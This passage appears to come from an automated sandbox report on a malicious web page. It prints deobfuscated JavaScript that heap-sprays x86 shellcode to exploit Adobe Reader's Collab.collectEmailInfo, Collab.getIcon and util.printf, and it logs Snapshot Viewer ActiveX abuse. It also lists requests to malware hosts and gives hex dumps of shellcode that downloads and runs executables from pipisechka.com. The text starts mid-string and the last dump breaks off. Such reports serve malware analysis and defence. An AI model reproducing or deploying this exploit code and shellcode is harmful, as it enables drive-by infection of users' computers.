%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 %u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D %u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D %u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D %u6C73%u6565%u2F70%u6361%u746E%u3279%u652E%u6578%u6800%u7474%u3A70%u2F2F%u6970%u6970%u6573 %u6863%u616B%u632E%u6D6F%u732F%u656C%u7065%u632F%u696C%u6B63%u702E%u7068%u723F%u003D"); 
var mem_array = new Array(); var cc = 0x0c0c0c0c; var addr = 0x400000; var sc_len = shellcode.length * 2; var len = addr - (sc_len + 0x38); var yarsp = unescape("%u9090%u9090"); yarsp = fix_it(yarsp, len); var count2 = (cc - 0x400000) / addr; for (var count = 0; count < count2; count ++ ){ mem_array[count] = yarsp + shellcode; } var overflow = unescape("%u0c0c%u0c0c"); while (overflow.length < 44952){ overflow += overflow; } this .collabStore = Collab.collectEmailInfo({ subj : "", msg : overflow } ); } function collab_geticon(){ if (app.doc.Collab.getIcon){ var arry = new Array(); var vvpethya = unescape(" %uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845 %u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057 %u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14 %u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B %u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603 %uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3 %uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589 %u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6 %u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE %uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75 %u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08 %uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC %u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6 %u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC %uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D 
%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708 %u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000 %u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856 %u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D %u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8 %u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351 %u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A %uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45 %u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D %u6C73%u6565%u2F70%u6867%u6D69%u7371%u2E32%u7865%u0065%u7468%u7074%u2F3A%u702F%u7069%u7369 %u6365%u6B68%u2E61%u6F63%u2F6D%u6C73%u6565%u2F70%u6C63%u6369%u2E6B%u6870%u3F70%u3D72%u0000" ); var hWq500CN = vvpethya.length * 2; var len = 0x400000 - (hWq500CN + 0x38); var yarsp = unescape("%u9090%u9090"); yarsp = fix_it(yarsp, len); var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000; for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){ arry[vqcQD96y] = yarsp + vvpethya; } var tUMhNbGw = unescape("%09"); while (tUMhNbGw.length < 0x4000){ tUMhNbGw += tUMhNbGw; } tUMhNbGw = "N." 
+ tUMhNbGw; app.doc.Collab.getIcon(tUMhNbGw); } } function pdf_start(){ var version = app.viewerVersion.toString(); version = version.replace(/\D/g, ''); var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2)); if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)){ util_printf(); } if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)){ collab_email(); } if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){ collab_geticon(); } } pdf_start();
Writes
No writes.
Network Activity
Requests
| URL | Status | Content Type |
|---|---|---|
| http://bertilladingman36429.blogspot.com/ | 200 | text/html |
| about:blank | 200 | text/html |
| http://afsharteam1.com/win/file2.htm | 200 | text/html |
| http://pipisechka.com/sleep/news.php?s=fb71a5433b | 200 | text/html |
| http://pipisechka.com/sleep/bgrx.pdf | 200 | application/pdf |
| http://afsharteam1.com/win/setup.exe | 200 | application/x-msdos-program |
Redirects
No redirects.
ActiveX controls
-
0955AC62-BF2E-4CBA-A2B9-A63F772D46CF Name Value Count Attributes width 1
1 height 1
1 data ./cilpqxds.jpg
1 -
AcroPDF.PDF No attribute setting or method call detected -
AcrobatJavaScript Name Arg0 Arg1 Count Methods Collab.getIcon N...............................................................................
................................................................................
................................................................................
other 15840 bytes
................................................................................
................................................................................
................................................................................
..................................................................1 N...............................................................................
................................................................................
................................................................................
other 15840 bytes
................................................................................
................................................................................
................................................................................
..................................................................1 Collab.collectEmailInfo ''
e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0
b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0
8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c
other 196512 bytes
e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0
b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0
8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c1 ''
e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0
b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0
8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c
other 196512 bytes
e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0
b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0
8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c e0 b0 8c1 util.printf %45000f
1.3E295
2 -
ShockwaveFlash.ShockwaveFlash.7 Name Arg0 Count Methods GetVariable $version
1 -
snpvw.Snapshot Viewer Control.1 Name Count Methods PrintSnapshot 1 Name Value Count Attributes ShowNavigationButtons false
1 Zoom 0.0
1 CompressedPath c:/Program Files/Outlook Express/wab.exe
1 AllowContextMenu false
1 SnapshotPath http://pipisechka.com/sleep/cdkpsv7.exe
1 -
clsid:ca8a9780-280d-11cf-a24d-444553540000 No attribute setting or method call detected
Shellcode and Malware
| Hexadecimal | ASCII |
|---|---|
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 
76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 73 64 67 73 67 35 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 | .....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /pipisechka.com/ sleep/sdgsg5.exe .http://pipisech ka.com/sleep/cli ck.php?r=. |
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 
76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 66 70 74 76 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 00 | .....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /pipisechka.com/ sleep/fptv2.exe. http://pipisechk a.com/sleep/clic k.php?r=.. |
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 
76 11 40 33 c9 84 db 74 0c 40 38 08 75 fb 40 fe cb eb f2 33 c0 89 45 fc 8b 45 fc 5b c9 c3 32 02 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 67 6e 62 69 7a 32 2e 65 78 65 00 68 74 74 70 3a 2f 2f 70 69 70 69 73 65 63 68 6b 61 2e 63 6f 6d 2f 73 6c 65 65 70 2f 63 6c 69 63 6b 2e 70 68 70 3f 72 3d 00 | .....Vd.0....@.. p...@.^.U...E.R3 ....2.@.8.u...Z] ...U..QQSVW`.].3 ..u....v<.Nx...Q .R.Q$R.q.N.u..q ...J.B`;U.u.3..7 3..E.....u.+.OQ. ....;.at....E..^ ......3...._.... ........E.a.E._^ [..U..Q.I...Ph.` ...l...3.RR.u... .E..E...U......E .P.E.u.E.r.E.l.E .m.E.o.E.n.E...E .d.E.l.E.l.E.... ...Ph].......... ...t.j.j..u..u.j .....u.@..3...W3 ..L$..|$...._..L $..9...t.@.8.u.+ ..U....dS.E.W3.P .E.k.E.e.E.r.E.n .E.e.E.l.E.3.E.2 .E...E.d.E.l.E.l .]......PhhC.... ......E.jDP.~... .E.j.P.s.......E .P.E.PSSSSSS.u.. E.D...S.._...[.. U..QQSVWjB.r.... .3...Y.E.a.ex.E. e...~V.E.PV.Q... YP.......YYt9.F. P.;......E.P.!.. ...YYt.W.....Y.D 8.sP.E...X.E.PW. t...YYFF;.|._^[. .U..QSf`.2.....X 8.t.@..@.]...Bu. 3.......8.v.@3.. .t.@8.u.@....3.. E..E.[..2.http:/ /pipisechka.com/ sleep/gnbiz2.exe .http://pipisech ka.com/sleep/cli ck.php?r=. |
e9 eb 01 00 00 56 64 a1 30 00 00 00 8b 40 0c 8b 70 1c ad 8b 40 08 5e c3 55 8b ec 8b 45 08 52 33 d2 c1 c2 03 32 10 40 80 38 00 75 f5 8b c2 5a 5d c2 04 00 55 8b ec 51 51 53 56 57 60 8b 5d 08 33 c0 8b 75 0c 8b fe 03 76 3c 8b 4e 78 03 cf 8b 51 1c 52 8b 51 24 52 8b 71 14 4e 89 75 fc 8b 71 20 03 f7 99 4a ad 42 60 3b 55 fc 75 04 33 c0 eb 37 33 ff 03 45 0c 97 8b cf ae 75 fd 2b f9 4f 51 e8 94 ff ff ff 3b c3 61 74 02 eb d9 8b 45 0c 92 5e 03 f2 d1 e0 03 c6 33 c9 0f b7 08 5f c1 e1 02 03 ca 03 cf 8b 01 03 c2 89 45 f8 61 8b 45 f8 5f 5e 5b c9 c3 55 8b ec 51 e8 49 ff ff ff 50 68 e8 60 bf 04 e8 6c ff ff ff 33 d2 52 52 ff 75 08 ff d0 89 45 fc 8b 45 fc c9 c3 55 8b ec 83 ec 0c 8d 45 f4 50 c6 45 f4 75 c6 45 f5 72 c6 45 f6 6c c6 45 f7 6d c6 45 f8 6f c6 45 f9 6e c6 45 fa 2e c6 45 fb 64 c6 45 fc 6c c6 45 fd 6c c6 45 fe 00 e8 a0 ff ff ff 50 68 5d 8a 11 16 e8 15 ff ff ff 83 c4 0c 85 c0 74 15 6a 00 6a 00 ff 75 0c ff 75 08 6a 00 ff d0 85 c0 75 03 40 c9 c3 33 c0 c9 c3 57 33 c0 8b 4c 24 0c 8b 7c 24 08 fc f3 aa 5f c3 8b 4c 24 04 80 39 00 8b c1 74 06 40 80 38 00 75 fa 2b c1 c3 55 8b ec 83 ec 64 53 8d 45 f0 57 33 db 50 c6 45 f0 6b c6 45 f1 65 c6 45 f2 72 c6 45 f3 6e c6 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 45 f8 2e c6 45 f9 64 c6 45 fa 6c c6 45 fb 6c 88 5d fc e8 0b ff ff ff 50 68 68 43 f9 8e e8 80 fe ff ff 8b f8 8d 45 9c 6a 44 50 e8 7e ff ff ff 8d 45 e0 6a 10 50 e8 73 ff ff ff 83 c4 1c 8d 45 e0 50 8d 45 9c 50 53 53 53 53 53 53 ff 75 08 c7 45 9c 44 00 00 00 53 ff d7 5f 0f b6 c0 5b c9 c3 55 8b ec 51 51 53 56 57 6a 42 e8 72 00 00 00 8b d8 33 f6 85 db 59 c7 45 f8 61 2e 65 78 c7 45 fc 65 00 00 00 7e 56 8d 45 f8 50 56 e8 51 00 00 00 59 50 e8 b1 fe ff ff 85 c0 59 59 74 39 8d 46 01 50 e8 3b 00 00 00 8b f8 8d 45 f8 50 e8 21 ff ff ff 85 c0 59 59 74 0c 57 e8 01 ff ff ff 59 c6 44 38 ff 73 50 8d 45 f8 fe 00 58 8d 45 f8 50 57 e8 74 fe ff ff 59 59 46 46 3b f3 7c aa 5f 5e 5b c9 c3 55 8b ec 51 53 66 60 b1 32 e8 00 00 00 00 58 38 08 74 03 40 eb f9 40 8b 5d 08 80 fb 42 75 08 33 db 8a 18 8b c3 eb 17 38 18 
